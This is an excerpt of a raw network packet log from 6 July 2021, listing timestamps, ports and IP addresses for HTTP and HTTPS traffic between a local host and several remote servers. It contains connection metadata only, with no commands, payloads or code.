Jul 6, 2021 14:31:25.313206911 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313235044 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313261986 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313288927 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313316107 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313344955 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313373089 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313400030 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313426971 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313455105 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313493967 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313520908 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313549042 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313575983 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313605070 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313633919 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313662052 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313688993 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313718081 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313745975 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313774109 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313802004 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313829899 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313858032 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313884974 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.313913107 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.322777987 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.322887897 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.359781027 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.359816074 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.359843969 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.359870911 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.359884977 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.359896898 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.359924078 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.359925985 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.359947920 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.359951019 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.359973907 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.359978914 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360002995 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360006094 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360023022 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360033989 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360044956 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360060930 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360074997 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360089064 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360100031 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360115051 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360126972 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360142946 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360151052 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360169888 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360188961 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360210896 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360234022 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360263109 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360290051 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360316038 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360337019 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360343933 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360364914 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360371113 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360393047 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360399008 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360413074 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360425949 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360450983 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360452890 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360476971 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360480070 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360493898 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360507011 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360519886 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360533953 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360546112 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360560894 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360574961 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360589027 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360605001 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360616922 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360629082 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.360646009 CEST	80	49893	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:25.360655069 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:25.361644030 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:27.425761938 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:31:27.426007032 CEST	49762	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:31:27.426160097 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.426402092 CEST	49764	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.426904917 CEST	49765	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.427155018 CEST	49768	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.427182913 CEST	49766	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.427361012 CEST	49767	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.433469057 CEST	49745	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:31:27.433866024 CEST	49746	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:31:27.465140104 CEST	443	49762	87.248.118.22	192.168.2.4
Jul 6, 2021 14:31:27.465177059 CEST	443	49761	87.248.118.22	192.168.2.4
Jul 6, 2021 14:31:27.465257883 CEST	49762	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:31:27.465297937 CEST	49761	443	192.168.2.4	87.248.118.22
Jul 6, 2021 14:31:27.467195988 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.467225075 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.467245102 CEST	443	49763	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.467288971 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.467322111 CEST	49763	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.467511892 CEST	443	49764	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.467530012 CEST	443	49764	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.467557907 CEST	443	49764	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.467592955 CEST	49764	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.467617989 CEST	49764	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.468060970 CEST	443	49765	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.468089104 CEST	443	49765	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.468107939 CEST	443	49765	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.468130112 CEST	49765	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.468159914 CEST	443	49768	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.468162060 CEST	49765	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.468292952 CEST	443	49766	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.468430996 CEST	443	49768	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.468451023 CEST	443	49768	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.468489885 CEST	49768	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.468492985 CEST	443	49767	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.468509912 CEST	443	49767	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.468529940 CEST	49768	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.468578100 CEST	49767	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.468591928 CEST	443	49767	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.468633890 CEST	49767	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.468939066 CEST	443	49766	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.468960047 CEST	443	49766	151.101.1.44	192.168.2.4
Jul 6, 2021 14:31:27.469016075 CEST	49766	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.469038010 CEST	49766	443	192.168.2.4	151.101.1.44
Jul 6, 2021 14:31:27.472945929 CEST	443	49746	104.20.185.68	192.168.2.4
Jul 6, 2021 14:31:27.472971916 CEST	443	49745	104.20.185.68	192.168.2.4
Jul 6, 2021 14:31:27.473014116 CEST	49746	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:31:27.473047972 CEST	49745	443	192.168.2.4	104.20.185.68
Jul 6, 2021 14:31:27.597436905 CEST	49892	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:27.597554922 CEST	49893	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.201292038 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.201579094 CEST	49895	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.237880945 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.237986088 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.238842964 CEST	80	49895	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.238924980 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.239008904 CEST	49895	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.276432991 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.297597885 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.297622919 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.297645092 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.297665119 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.297681093 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.297681093 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.297693014 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.297700882 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.297704935 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.297717094 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.297729015 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.297744036 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.297823906 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.334815025 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.334923983 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.334952116 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.334999084 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335057020 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.335083961 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335083961 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.335135937 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.335155010 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335212946 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.335236073 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335256100 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335279942 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335299969 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335305929 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.335336924 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335346937 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.335369110 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335400105 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335402966 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.335416079 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.335427046 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335459948 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335479975 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335490942 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.335505009 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335525990 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335540056 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335541964 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.335562944 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335585117 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.335592031 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.335659027 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.335670948 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.372277021 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.372322083 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.372419119 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.372437954 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374138117 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374172926 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374202013 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374238968 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374265909 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374284029 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374289989 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374294043 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374310970 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374322891 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374344110 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374352932 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374383926 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374393940 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374413013 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374423981 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374442101 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374459028 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374470949 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374499083 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374525070 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374531031 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374533892 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374550104 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374569893 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374598980 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374619961 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374641895 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374643087 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374646902 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374671936 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374676943 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374694109 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374701977 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374730110 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374737978 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374758005 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374784946 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374787092 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374816895 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374825001 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374845982 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374850035 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374875069 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374878883 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374902964 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374903917 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374933958 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374943972 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374962091 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.374963045 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.374993086 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.375021935 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.375030041 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.375051975 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.375055075 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.375083923 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.375109911 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.375123978 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.375127077 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.375158072 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.375178099 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.375189066 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.375214100 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.375216961 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.375252008 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.375296116 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.409806967 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.409852982 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.409885883 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.409908056 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.409930944 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.409974098 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.412504911 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.412539959 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.412576914 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.412607908 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.412636995 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.412667990 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.412697077 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.412728071 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.412759066 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.412789106 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.412818909 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.412849903 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.412879944 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.412910938 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.412941933 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.412971020 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413017035 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413038015 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413039923 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413058996 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413062096 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413068056 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413095951 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413104057 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413122892 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413147926 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413151979 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413175106 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413193941 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413202047 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413220882 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413229942 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413259029 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413260937 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413276911 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413292885 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413295031 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413312912 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413355112 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413377047 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413383961 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413412094 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413424015 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413439035 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413465023 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413491011 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413491964 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413518906 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413547039 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413573980 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413595915 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413630962 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413638115 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413650990 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413655043 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413660049 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413686037 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413686991 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413713932 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413741112 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413768053 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413789034 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413795948 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413803101 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413806915 CEST	49894	80	192.168.2.4	45.90.58.179
